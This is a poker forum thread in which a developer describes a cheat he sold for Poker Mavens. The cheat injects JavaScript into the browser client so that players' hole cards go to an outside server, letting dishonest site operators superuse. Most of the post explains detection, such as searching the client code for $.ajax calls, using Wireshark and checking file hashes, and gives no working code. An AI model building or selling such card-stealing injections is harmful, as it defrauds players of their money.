Poker Mavens software hacked to allow superusing for shady operators

[Johnaudi]

Hello,

Allow me to introduce myself, although this is an unfortunate event, to provide some authenticity: I am a young developer who've had a history in developing (and reverse engineering) software, games, and auto-traders (for the forex/crypto market). (you can search up some of my other forum posts and sales on Google via my username, as this is not a self-advertising post, rather informative)

Some small context I would have to state is that the person was dealt a trial version of the patched Poker Mavens cheat, he never obtained the full cheat as he did not finish his payments. I'm assuming he went online searching for people to sell this cheat to fund his own (while making money I see), as the $10k price tag was indeed above the limits for a simple card showing trick.

So... I don't see anything in the thread here that mentions the 10k so how did he know?? It was on the show. The only other mention of the 10k was my post on Briggsoft where I said I had sent evidence to Kent on the identity of the "seller" and that I wasn't outting on the forum yet. So I'm gonna guess either they read or read the Briggsoft forum regularly which makes me suspicious still that Carbon19 is trying to pretend he's two different people and knows nothing about the seller. But it also reinforces the party in question definitely is a Briggsoft forum regular.

Although I do understand your concern, do note that I was able to get that price tag from the following post:

BTW, I feigned interest and the guy wanted $10k for his tool.

It's some random guy from Lebanon who contacted me, erroneously believing I would want to buy this for the PFA room.

Please note that I am the one from Lebanon, I am not sure of what his nationality is, or whether he is from the same country or not, I do hope it was not identity theft as stated in my email.

Note that if the hack was a modification/injection of javascript into the client module, that could be easily be detected. Since the browser loads the entire client code, (even though it is compressed) a byte for byte comparison against a clean site running the same version would make the hacked portion stand out like a sore thumb. And if that code was passing decrypted hole cards to an external server then you know it's a crooked site. Also using a packet sniffer like Wireshark to see if the client was making external connections to anything other than the File Port or Packet Port of the poker server would also be an indication that something was fishy.

On the other hand if the hack is simply a passive memory scanner that resides entirely on the server then there's no way to detect that. Other than how Ultimate Bet/Absolute Poker was brought down where they got greedy and let their superuser win too much such that it defied statistical odds (if I recall that correctly).

These words are indeed real and accurate, and I could not have said better otherwise. I will explain the hack provided and used by fellows among the community and ways to detect the cheating.

good morning
i have good news ... now u can know the flop turn river before they will be dealt so u can know who gonna win from the beginning of the hand
i can let u test it also

So it looks like you can do even better than superusing. You can have "clairvoyance" which is complete knowledge of the entire hand before it's dealt, which allows you to completely avoid bad beats. Wonderful, huh?

The second update will be in the next post...

Although this may or may not be possible (subject for research), the person who had access to my trial version of the cheat was not able to do so (the reason is going to be stated below). Unless he was able to obtain a different cheat from elsewhere, I highly doubt clientside users can access such data beforehand. I did tell him I would try to exploit it for an extra fee, though.

Now that certain things are cleared, I'd like to explain how to detect the vulnerability from the cheat (in case he had resold it to someone else) as he had violated the code of conduct that is supposed to be respected by both parties.

Before I do so, I'd like to state that Poker Mavens is indeed secure, it was not as easy as other poker software I've gone through, hence went with a different approach, this one required me to reverse engineer the javascript code on the client-side to make a user send the content to someone else.

In other words, what the hack does is change the code on each person opening Poker Mavens' browser page, like somewhat a 'spyware' in English, that checks what cards you received, then sends them to my server.

After listening to PFA's radio, I've seen that Dan stated that Kent did not provide a way to know whether the webserver is infected as a client, although his quotation above does, but not in a visible matter.

First, press Ctrl+Shift+I on Google Chrome, which will bring up the developer console. Press Sources, and select the javascript file of which contains the PokerMinJs javascript code.


Press Ctrl+F to search, and type in 'ajax', this is served to POST/GET content to the server, note that other cheats may use a different method of intercepting and posting methods, but that was in my case.


If you can find any $.ajax inside the code, do NOT play on that poker site, as it sends data to the owner on the hand of cards you own.

Please note that PokerMavens is still on the safer end of other poker software out there, and fortunately, most cheats relating to that software is discoverable by the client. I am not saying it is entirely secure as such a thing does not exist, yet it is on the safer side.

As Kent had stated, if the owner wants to cheat his clients, he WILL find a way to do so, please do not trust any poker website by its software (even those who are using very expensive software, some were easier to hack than PM itself). I respect this guy's code and ethics on not providing the card showing feature upon a client's request. (By making a good reputation out of his software and himself, and more work to fellow cheat developers like me -- just kidding). Any exposed cheat of mine that goes to ruin the reputation of the software/game will get exposed for fixing as I do not intend to destroy any persons' business on the bricks of building my own.

I'd also like to state that this is not the only way to expose cheats as lots of clients do not load the JS code in such a way, ALL poker software is vulnerable to packet sniffing and memory dump attacks. Some are more secure than others, but the concept is still the same. In the most extreme cases, you can send a replica of your screen to the attacker, making the superuser see what you can see on the table. (this works on almost all online web-based software)

In PM's case, the data was very well secured from packet intercepting as well, making my job slightly harder:

Command: "ECards"
Table: "Ring Game #01"
Type: "R"
Salt: "02B18FA165BF3C2F"
Hand: "22-1"
Card1: "2C"
Card2: "98"
Card3: "64"
Card4: "0A"
Card5: "9A"
Show: "No"

It does seem he had taken extra precaution on the sniffers, you can always decrypt it with the provided salt, but you'll not be able to intercept them mid-session as it uses the WebSocket's Seed as another key. (which makes packet sniffers less effective in Poker Mavens)

How could Kent fix this? Several ways, one of the common ways is to double-check the JS file's hash before posting it on the server; another would check the hash of the whole program to prevent its tampering. But I deem this as useless because a hacker will always find a way to hack in ANY ways possible. I suggest only playing poker in trusted real-life casinos, and not through the screen of your computer unless you completely trust the person hosting.

Do not hesitate to ask any questions regarding this or any other related topic.
Stay safe!